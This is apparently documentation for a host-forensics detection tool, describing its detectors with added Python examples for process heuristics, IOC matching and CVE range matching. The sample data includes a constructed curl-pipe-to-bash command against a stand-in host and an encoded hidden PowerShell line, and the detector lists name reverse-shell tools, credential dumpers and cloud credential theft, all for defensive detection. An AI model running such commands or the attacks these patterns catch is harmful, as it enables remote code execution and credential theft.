Detectors

59 detectors over a collected case, layered from behavioral heuristics to live intel matching, with auto-Sigma export per detector.
How they fit together
A detector implements detect(store) -> Iterable[Finding]. It reads
artifacts from the store via store.iter_artifacts(collector=...,
category=...), applies its logic, and yields findings. Detectors don't
talk to each other directly — they share the evidence store. Order is
incidental, except timeline which runs last and depends on
others.
Each finding has a severity (info low med high crit), a MITRE ATT&CK technique ID where applicable, a free-form evidence dict, and references to the underlying artifact UUIDs.
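To make the contract concrete, here is an added example (not digger's own code) of a detector in the shape just described: detect(store) -> Iterable[Finding], reading process artifacts through store.iter_artifacts(collector=..., category=...) and yielding findings with a severity, an ATT&CK technique where one applies, an evidence dict and artifact UUIDs. The Finding dataclass, the InMemoryStore and the process rows are constructed stand-ins for the evidence store and the process collector's output; the heuristics are three of the suspicious_processes checks listed below.

```python
"""Added example (not digger's code): a detector following detect(store) -> Iterable[Finding].
Finding, InMemoryStore and the sample process artifacts are constructed stand-ins."""
import re
from dataclasses import dataclass, field
from typing import Any, Iterable, Optional

BROWSERS = {"chrome", "google chrome", "firefox", "msedge", "brave", "brave browser"}
SHELLS = {"sh", "bash", "zsh", "powershell", "powershell.exe", "pwsh", "cmd.exe"}
DROP_DIRS = ("/tmp/", "/dev/shm/", "/users/public/", "/appdata/local/temp/")
# -EncodedCommand (or its -e/-ec/-enc prefixes) followed by a long base64 argument
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{100,})", re.I)
# curl|bash / wget|sh / iwr|iex pipe-to-shell shapes
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b|\biwr\b[^|]*\|\s*iex\b", re.I)


@dataclass
class Finding:
    detector: str
    severity: str                      # info | low | medium | high | critical
    title: str
    technique: Optional[str]           # MITRE ATT&CK ID where applicable
    evidence: dict = field(default_factory=dict)
    artifact_ids: list = field(default_factory=list)


class InMemoryStore:
    """Stand-in for the evidence store: artifacts are dicts with uuid/collector/category/data."""

    def __init__(self, artifacts: list):
        self._artifacts = artifacts

    def iter_artifacts(self, collector: Optional[str] = None, category: Optional[str] = None):
        for art in self._artifacts:
            if collector and art["collector"] != collector:
                continue
            if category and art["category"] != category:
                continue
            yield art


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(store) -> Iterable[Finding]:
    procs = list(store.iter_artifacts(collector="processes", category="process"))
    by_pid = {p["data"]["pid"]: p for p in procs}
    for art in procs:
        d = art["data"]
        exe, cmd = d.get("exe") or "", d.get("cmdline") or ""
        parent = by_pid.get(d.get("ppid"))
        ev: dict = {"pid": d["pid"], "exe": exe, "cmdline": cmd}
        # Browser -> shell: a browser (or its renderer) has no business spawning a shell.
        if parent and _basename(parent["data"].get("exe") or "") in BROWSERS and _basename(exe) in SHELLS:
            yield Finding("suspicious_processes", "high", "Shell spawned by browser", "T1059",
                          {**ev, "parent_exe": parent["data"]["exe"]}, [art["uuid"], parent["uuid"]])
        # No exe path: the binary may have been unlinked after exec or loaded via memfd.
        if not exe:
            yield Finding("suspicious_processes", "medium", "Process with no exe path", None, ev, [art["uuid"]])
        # Executable running out of a drop location.
        elif any(dd in exe.replace("\\", "/").lower() for dd in DROP_DIRS):
            yield Finding("suspicious_processes", "medium", "Executable in drop location", "T1059", ev, [art["uuid"]])
        # PowerShell -EncodedCommand carrying a long base64 payload.
        if _basename(exe) in {"powershell", "powershell.exe", "pwsh"} and ENCODED.search(cmd):
            yield Finding("suspicious_processes", "high", "Encoded PowerShell command", "T1059.001", ev, [art["uuid"]])
        # curl|bash and iwr|iex pipe-to-shell patterns.
        if PIPE_TO_SHELL.search(cmd):
            yield Finding("suspicious_processes", "high", "Pipe-to-shell pattern", "T1059", ev, [art["uuid"]])


def sample_store() -> InMemoryStore:
    """Constructed process artifacts (pid, ppid, exe, cmdline) as a process collector would record them."""
    rows = [
        (1, 0, "/sbin/launchd", "/sbin/launchd"),
        (100, 1, "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", "Google Chrome"),
        (101, 100, "/bin/bash", "bash -c 'curl -s http://example.invalid/s.sh | bash'"),
        (102, 1, "", "./loader"),
        (103, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -NoP -W Hidden -EncodedCommand " + "QUJD" * 30),
        (104, 1, "/tmp/.cache/python3", "/tmp/.cache/python3 agent.py"),
        (105, 1, "/usr/sbin/sshd", "sshd: /usr/sbin/sshd [listener]"),
    ]
    return InMemoryStore([
        {"uuid": f"proc-{pid}", "collector": "processes", "category": "process",
         "data": {"pid": pid, "ppid": ppid, "exe": exe, "cmdline": cmd}}
        for pid, ppid, exe, cmd in rows
    ])


def run_sample() -> list:
    return list(detect(sample_store()))


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.severity}] {f.title} pid={f.evidence['pid']} {f.technique or '-'}")
```

Because detectors share only the store, the same detect() runs unchanged against any store object that exposes iter_artifacts(); the sample produces five findings, two of them (browser-spawned shell and pipe-to-shell) on the same artifact.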
The roster
suspicious_processes
Heuristics over the live process tree:
- Shell spawned by browser (Chrome/Firefox/Edge/Brave → sh/bash/powershell)
- Interpreters running from drop locations (/tmp, %TEMP%, /Users/Public, …)
- Process with no exe path (potential unlinked / memfd execution)
- PowerShell -EncodedCommand with long base64 payload
- curl|bash and iwr|iex pipe-to-shell patterns
network_anomaly
Listening sockets outside a benign-port allow-list; established external connections (with the owning process linked back from the process collector).
persistence_outlier
Generic cross-platform: every artifact in category persistence
is scanned for references to writable/world-shared paths
(/tmp/, /Users/Public/, \AppData\Local\Temp\,
/dev/shm/, …) and for binaries in user-writable scratch space.
lolbins
Living-off-the-land tradecraft. Pattern set covers LOLBAS (certutil,
bitsadmin, mshta, regsvr32, rundll32 with URL, msbuild, installutil),
GTFOBins (osascript shell escape, xattr quarantine removal, curl/wget fetching
executable content, nc/socat reverse shells, python socket.socket
one-liners, bash /dev/tcp/).
yara
If yara-python is installed, compiles every .yar/.yara
file under digger/rules/yara/ and any directory you pass via the
detector's extra_dirs argument. Scans:
- The executables of running processes
- Files in the recent_files collector's drop-location walk
Bundled rules cover mimikatz strings, Cobalt Strike default beacon strings, PowerView/PowerSploit, reverse-shell one-liners, credential-harvest keywords, and Shai-Hulud markers.
ioc
Plain-text IOC feeds from digger/rules/iocs/*.txt. Indicator
type auto-detected by format: SHA-256 (64 hex), MD5 (32 hex), IPv4, URL,
domain, path. Process exe SHA-256s are matched against the hash list; every
artifact's serialized data is searched for IP/domain matches.
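The format-based type detection and the two match modes described above, as an added example (not digger's own code): classify() assigns each feed line one of sha256 / md5 / ipv4 / url / domain / path by shape, load_feed() builds per-type sets from one *.txt feed, and the matchers check a process exe SHA-256 against the hash set and search an artifact's serialized data for IP/domain hits. The feed text, the serialized artifact and all indicator values are constructed for the example.

```python
"""Added example (not digger's code): IOC feed type detection and matching.
All indicator values, the feed text and the artifact string are constructed."""
import re
from typing import Optional

_HEX = re.compile(r"^[0-9a-fA-F]+$")
_IPV4 = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")
_URL = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://\S+$")
_DOMAIN = re.compile(r"^(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,63}$")
_PATH = re.compile(r"^(?:/|~/|[a-zA-Z]:\\|\\\\)")


def classify(indicator: str) -> Optional[str]:
    """Return sha256 | md5 | ipv4 | url | domain | path, or None when no format fits."""
    s = indicator.strip()
    if _HEX.match(s) and len(s) == 64:
        return "sha256"
    if _HEX.match(s) and len(s) == 32:
        return "md5"
    m = _IPV4.match(s)
    if m and all(0 <= int(octet) <= 255 for octet in m.groups()):
        return "ipv4"
    if _URL.match(s):
        return "url"
    if _PATH.match(s):          # checked before domain: paths never look like hostnames
        return "path"
    if _DOMAIN.match(s):
        return "domain"
    return None


def load_feed(text: str) -> dict:
    """Parse one plain-text feed: blank lines and '#' comment lines are skipped, hashes lower-cased."""
    feed: dict = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        kind = classify(line)
        if kind is None:
            continue            # unrecognised shape: ignore rather than guess
        if kind in ("sha256", "md5"):
            line = line.lower()
        feed.setdefault(kind, set()).add(line)
    return feed


def _bounded(indicator: str) -> re.Pattern:
    # Boundaries so that 10.0.0.5 does not match inside 110.0.0.50, while
    # example.invalid still matches the subdomain sub.example.invalid.
    return re.compile(r"(?<![\w-])" + re.escape(indicator) + r"(?![\w.-])", re.I)


def match_hash(exe_sha256: str, feed: dict) -> bool:
    """Process exe SHA-256 against the feed's hash list."""
    return exe_sha256.lower() in feed.get("sha256", set())


def match_text(serialized: str, feed: dict) -> list:
    """Search an artifact's serialized data for any feed IPv4 or domain; returns (type, indicator) hits."""
    hits = []
    for kind in ("ipv4", "domain"):
        for ind in sorted(feed.get(kind, ())):
            if _bounded(ind).search(serialized):
                hits.append((kind, ind))
    return hits


SAMPLE_FEED = """# constructed feed for the example
deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef
DEADBEEFDEADBEEFDEADBEEFDEADBEEF
198.51.100.23
http://c2.example.invalid/gate.php
c2.example.invalid
/tmp/.hidden/agent
not an indicator
"""


def run_sample():
    feed = load_feed(SAMPLE_FEED)
    # constructed serialized network-connection artifact
    artifact = '{"laddr": "10.0.0.5:51234", "raddr": "198.51.100.23:443", "host": "www.c2.example.invalid"}'
    return feed, match_text(artifact, feed), match_hash("DEADBEEF" * 8, feed)


if __name__ == "__main__":
    feed, hits, hash_hit = run_sample()
    print({k: sorted(v) for k, v in feed.items()}, hits, hash_hit)
```

The hex checks run first so a 32- or 64-character hash is never mistaken for a hostname, and the boundary regex is what keeps a short feed IP from matching inside a longer, unrelated address.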
shai_hulud
Targeted detector for the Shai-Hulud npm worm:
- Compromised name@version matches against the bundled list and the live shai_hulud_packages feed
- Workflow file matching shai-hulud-workflow.yml in any local repo
- Worm marker strings (trufflehog, shai-hulud-workflow, GITHUB_TOKEN, …) in any workflow file body
- webhook.site/<uuid> URLs in workflows or live process command lines
supply_chain
Two layers:
- Malicious-package match — npm/PyPI/gem package@version pairs from the bundled list + live OpenSSF malicious-packages feed.
- CISA KEV cross-check — installed-software inventory matched against CISA Known Exploited Vulnerabilities entries (live feed with bundled snapshot fallback).
c2
C2-framework signatures from digger/rules/c2/c2_signatures.yaml:
Cobalt Strike, Sliver, Mythic, Brute Ratel, Havoc, Empire, Metasploit
Meterpreter, Pupy, Posh-C2, AsyncRAT family. Matches against browser
history URLs and process command lines.
Also fuses live intel:
- Established connection IPs vs. ThreatFox
- Process exe SHA-256s vs. MalwareBazaar
- URLs vs. URLhaus
threat_actor
Named-actor TTP patterns from digger/rules/threat_actors/ttp_signatures.yaml:
APT29/Midnight Blizzard, APT28, FIN7, Lazarus, Volt Typhoon, Scattered
Spider/Octo Tempest, Black Basta/BlackCat/Akira ransomware affiliates.
Attribution is heuristic — multiple actors share TTPs, so digger reports
the match without making a definitive call.
browser
Flags Chrome/Edge/Brave/Firefox extensions with sweeping permissions:
<all_urls>, webRequest, cookies,
history, clipboardRead/Write, nativeMessaging,
debugger, management, proxy.
env_hijack
Environment variables that override the dynamic linker
(LD_PRELOAD, LD_AUDIT,
DYLD_INSERT_LIBRARIES), shell init hooks
(PROMPT_COMMAND, BASH_ENV, ENV),
or PATH entries pointing at writable temp dirs.
ssh_auth_keys
authorized_keys with forced-command directives, unusually long key lists, unrestricted keys.
service_cve
Pulls service versions captured by service_versions collector
and matches them against the live NVD CPE-keyed CVE corpus
(nvd_service_cves feed, 24h refresh). Range-aware: handles
introduced / fixed / last_affected
OSV-style ranges with loose semver. No bundled fallback — runs only when
the live cache is populated. Tag: T1190.
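The range-aware part of that matching, as an added example that is not digger's own code: loose_version() reduces a collected version string to its numeric components, in_osv_range() applies OSV event semantics (introduced inclusive, fixed exclusive, last_affected inclusive, an unterminated introduced running open-ended), and match_services() joins a CPE-keyed corpus against the collected inventory and tags hits T1190. The CPE strings, CVE ids, versions and ranges are constructed placeholders, not advisory data.

```python
"""Added example (not digger's code): OSV-style range matching with loose semver.
CPE keys, CVE ids and versions are constructed placeholders."""
import re
from typing import Optional, Tuple


def loose_version(v: str) -> Tuple[int, ...]:
    """'OpenSSH_8.9p1' -> (8, 9, 1); '2.4.49-2ubuntu1' -> (2, 4, 49, 2, 1). Non-numeric text is ignored."""
    nums = tuple(int(n) for n in re.findall(r"\d+", v))
    return nums or (0,)


def in_osv_range(version: str, events: list) -> bool:
    """OSV event semantics: each 'introduced' opens an interval that the next
    'fixed' (exclusive) or 'last_affected' (inclusive) closes; introduced "0"
    means every release; an interval nobody closes extends forever."""
    v = loose_version(version)
    start: Optional[Tuple[int, ...]] = None
    for ev in events:
        if "introduced" in ev:
            start = loose_version(ev["introduced"])
        elif start is not None and "fixed" in ev:
            if start <= v < loose_version(ev["fixed"]):
                return True
            start = None
        elif start is not None and "last_affected" in ev:
            if start <= v <= loose_version(ev["last_affected"]):
                return True
            start = None
    return start is not None and v >= start      # open-ended interval


def match_services(services: list, corpus: dict) -> list:
    """services: [{"cpe", "version"}] from the collector; corpus: cpe -> [{"id", "ranges"}] from the feed."""
    findings = []
    for svc in services:
        for entry in corpus.get(svc["cpe"], []):
            if any(in_osv_range(svc["version"], events) for events in entry["ranges"]):
                findings.append({"cve": entry["id"], "cpe": svc["cpe"],
                                 "version": svc["version"], "technique": "T1190"})
    return findings


HTTPD = "cpe:2.3:a:example:httpd:*:*:*:*:*:*:*:*"   # constructed placeholder CPE
SSHD = "cpe:2.3:a:example:sshd:*:*:*:*:*:*:*:*"     # constructed placeholder CPE

CORPUS = {  # constructed; CVE ids are placeholders, not real advisories
    HTTPD: [
        {"id": "CVE-PLACEHOLDER-0001", "ranges": [[{"introduced": "0"}, {"fixed": "2.4.50"}]]},
        {"id": "CVE-PLACEHOLDER-0002", "ranges": [[{"introduced": "2.4.0"}, {"last_affected": "2.4.52"}]]},
    ],
    SSHD: [
        # two intervals: [1.0, 1.2) and everything from 2.0 onward (never fixed)
        {"id": "CVE-PLACEHOLDER-0003",
         "ranges": [[{"introduced": "1.0"}, {"fixed": "1.2"}, {"introduced": "2.0"}]]},
    ],
}

SERVICES = [  # constructed service_versions output
    {"cpe": HTTPD, "version": "2.4.49-2ubuntu1"},
    {"cpe": HTTPD, "version": "2.4.53"},
    {"cpe": SSHD, "version": "OpenSSH_1.5p2"},
    {"cpe": SSHD, "version": "OpenSSH_2.9p1"},
]


def run_sample() -> list:
    return match_services(SERVICES, CORPUS)


if __name__ == "__main__":
    for f in run_sample():
        print(f["cve"], f["cpe"], f["version"], f["technique"])
```

Distro suffixes such as -2ubuntu1 survive as trailing tuple elements, which is what makes 2.4.49-2ubuntu1 compare below a fixed value of 2.4.50 while 2.4.50-1 compares above it; that is the "loose" in loose semver, and it is also why a backported distro fix cannot be recognised from the version string alone.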
firewall_audit
See Firewall audit + remediation. Eight
checks across pf / nftables / iptables / ufw / firewalld / WFP +
macOS Application Firewall, with platform-specific copy-pasteable fix
commands routed through redact_dangerous_command.
Counter-offensive detectors
Nine detectors target Decepticon-style red-team tradecraft, all observation-only. See Decepticon countermeasures for the full phase-by-phase rundown.
- recon — portscan footprints, SSH brute-force / banner-grab / user-enumeration (T1595.001, T1110.001, T1592.002, T1589.002)
- exploitation — service-spawns-shell, three-tier RCE chains, 11 shellcode-shape cmdline patterns, web-server log exploit signatures including Log4Shell / Spring4Shell / inline PHP / Shellshock (T1190 / T1059 / T1203)
- privesc — world-writable setuid, setuid in scratch / home, GTFOBins-trivial setuid (perl/python/awk/bash/cp/mv), sudoers NOPASSWD: ALL, dangerous Linux file capabilities, kernel taint bits decoded (T1548 / T1068 / T1547.006)
- lateral — SMB/SSH/WinRM/RDP/VNC outbound to RFC1918, credential dumpers (mimikatz / Rubeus / SafetyKatz / secretsdump / LaZagne / Certipy), Impacket / evil-winrm / CrackMapExec / Responder by name, SSH ProxyJump, pass-the-hash markers in Windows 4624 (T1021 / T1550 / T1570)
- ad_attacks — Kerberoasting (4769 RC4-HMAC), AS-REP roast (4768 PreAuthType 0), BloodHound family, DCSync via cmdline or 4662 replication-rights GUID, AdminSDHolder modification (5136) (T1558.003 / T1558.004 / T1003.006 / T1484.001)
- cloud_attacks — IMDS endpoint (169.254.169.254) hit from non-cloud-agent processes, cloud creds in shell env, world-readable credentials files, container escape primitives, kubeconfig theft, cloud-CLI privesc commands (T1552.005 / T1078.004 / T1611)
- counter_re — gdb / lldb / dtrace / x64dbg / IDA / Ghidra / radare2 / frida / WinDbg with target PID matching digger or an EDR / audit process; self-attribution via digger.opsec.self_id (T1622 / T1057)
- persistent_sessions — tmux/screen/zellij parented by network services, detached nohup/setsid with sockets, user-systemd ExecStart in user-writable shell scripts (T1546 / T1543.002)
- attacker_tooling — 60+ red-team tools across 10 categories; running OR installed; self-attribution for dev-clone / venv paths (T1588.002)
memory_anomaly (extended)
RWX regions, anonymous-exec regions, drop-loaded modules — same as
before, but severity now escalates to critical when the affected
process's parent is a listening network service (the canonical
post-RCE landing signature). Cross-correlates with the
exploitation detector's parent-name set.
browser (extended)
See Browser scanner for the full list of branches. Beyond the original risky-extension check, the detector now covers cookies (counts + bad-host), saved-passwords summary, IndexedDB / Local Storage / PWAs / profile defaults, service workers with URLhaus + ThreatFox cross-reference, and a corpus-driven detection for unpatched Chromium bugs.
sigma
Optional. Run via digger sigma --case-dir <case>. Loads
Sigma YAML rules from the bundled corpus AND the live SigmaHQ rule
cache (sigmahq_corpus feed), matches them against
process_creation and network_connection log sources. See
Sigma rules.
Specialized auditors
Detectors that pair with a dedicated collector / ingester and run only after that collector has populated the case:
- idp_security — see IdP audit-log observability. Ingests Okta / Entra / Workspace audit logs and detects MFA fatigue, OAuth phishing, admin / federation tampering, impossible travel, password spray (I1–I6, T1110.003 / T1621 / T1098.001 / T1078.004 / T1556.007).
- slsa_audit — see SLSA provenance audit. Walks node_modules + site-packages, parses any local in-toto / SLSA / sigstore-bundle attestations, flags missing / unparseable / untrusted-builder / source-mismatched provenance (S1–S5, T1195.002).
- k8s_security — Kubernetes cluster-side forensics. Privileged pods, dangerous hostPath, hostNetwork / PID / IPC, ClusterRoleBinding to system:authenticated, SA → cluster-admin, untrusted-registry images, secret-baked-in-env, default SA, namespace missing NetworkPolicy (K1–K10, T1611 / T1098 / T1525 / T1078.001).
- android_security — see Android forensics (adb). Sideloaded installs, AccessibilityService abuse, device-admin grants, swiss-army-knife permission combos, stale security patches (A1–A6, T1417 / T1626 / T1430 / T1404).
- mcp_audit — see MCP config audit. Project-scoped autoinstall, raw-script exec, credential env vars, network transport, untrusted npm scope (P1–P5, T1195.002 / T1059 / T1552.001 / T1071.001).
- ci_workflow_audit — see CI/CD workflow audit. Pwn-request, workflow_run from forks, untrusted-input interpolations, unpinned third-party actions, persist-credentials, write-all permissions, self-modifying workflows (W1–W7, T1199 / T1195.002 / T1059 / T1552.001 / T1078.004).
- git_hook_audit — see Git hook audit. Pipe-to-shell, network-fetch in silent-operation hooks, eval-input injection, self-modifying hooks, encoded payloads, plus silent-op-hook surface-area awareness (G1–G7, T1546 / T1059 / T1027 / T1505.003).
- macos_tcc — see macOS TCC consent audit. Non-Apple grants for FullDiskAccess / Accessibility / PostEvent / ScreenCapture / Camera / Mic / AppleEvents, grants to binaries in suspicious paths, user-DB-only grants that bypass the system DB (T1–T5, T1543.001 / T1056.001 / T1113 / T1125 / T1123 / T1559.001).
- macos_launchd — see macOS launchd deep audit. Network-fetch in ProgramArguments, encoded payloads, Label/filename masquerade, WatchPaths on writable dirs, interpreter+KeepAlive respawn loops, osascript runners (L1–L7, T1543.001 / T1059.004 / T1059.002 / T1027 / T1036 / T1546).
- vscode_audit — see VS Code audit. Sideloaded extensions, untrusted publishers, workspace-trust disablement, http.proxyStrictSSL=false, terminal-shell hijacks, project-scoped .vscode/settings.json with risky keys (V1–V7, T1195.002 / T1546 / T1059 / T1557 / T1505.003).
- browser_ext_perms — see Browser extension permission combinations. nativeMessaging, webRequest+all_urls, all_urls+cookies+tabs (session theft), proxy / debugger, generic spy stack, hardware bridges, declarativeNetRequest with many host patterns (B1–B8, T1176 / T1071.001 / T1539 / T1557 / T1090 / T1056.001 / T1543).
Persistence (cross-platform)
Deep-audit detectors that complete the cross-platform persistence story (macOS launchd + TCC, Linux systemd / cron / shell rc, Windows registry). Each runs on the existing platform collector's artifacts; no new CLI commands required.
- systemd_audit — see Linux systemd unit audit. User AND system unit text inspected: network-fetch in Exec*, encoded payloads, interpreter + Restart respawn, ExecStart from writable path + auto-enabled, root + writable Exec target, writable EnvironmentFile / LoadCredential, sub-minute timers (U1–U7, T1543.002 / T1059.004 / T1053.006 / T1027 / T1546).
- cron_audit — see Cron / anacron / at deep audit. /etc/crontab + /etc/cron.* + /var/spool/cron* + /var/spool/at: network-fetch, encoded payloads, command in writable path, root-context with attacker path, @reboot, at-jobs, high-frequency cadence (C1–C7, T1053.003 / T1053.001 / T1059.004 / T1027 / T1546 / T1037).
- shell_profile_audit — see Shell rc / profile audit. Bash / zsh / fish / nushell init files under HOME + /etc: network-fetch, encoded payloads, PATH prepend with writable head, alias hijack of sudo / ssh / git / docker, trap / PROMPT_COMMAND / precmd, source from writable, LD_PRELOAD / DYLD_INSERT_LIBRARIES export (SH1–SH7, T1546.004 / T1059.004 / T1027 / T1574.007 / T1574.006).
- windows_registry_audit — see Windows registry persistence audit. Run / RunOnce values with writable path, LOLBin proxy executors, encoded PowerShell, network-fetch; Winlogon Shell / Userinit hijack; SilentProcessExit MonitorProcess (R1–R6, T1547.001 / T1547.004 / T1546.012 / T1218 / T1059.001 / T1027).
timeline
Synthesizes a chronological event timeline from process create times, recent-file mtimes, and macOS quarantine timestamps. Emits one informational finding containing up to 2000 sorted events for report rendering.
Running a subset
digger scan --case-dir x --only suspicious_processes,c2,shai_hulud
Severity ladders
| Pill | Meaning |
|---|---|
| critical | High-confidence malicious. Examples: confirmed Shai-Hulud package, MalwareBazaar hash match on a running exe, live ThreatFox IP match. |
| high | Strong tradecraft signal: encoded PowerShell, certutil URL cache, browser-spawns-shell, LD_PRELOAD set. |
| medium | Suspicious but plausibly explainable: process with no exe, browser extension with sweeping perms, persistence pointing at user-scratch path. |
| low | Worth a glance: listener on unusual port. |
| info | Not an indicator of compromise. External connection record, timeline summary. |
The AI triage step re-grades severity independently using the IC estimative-probability ladder.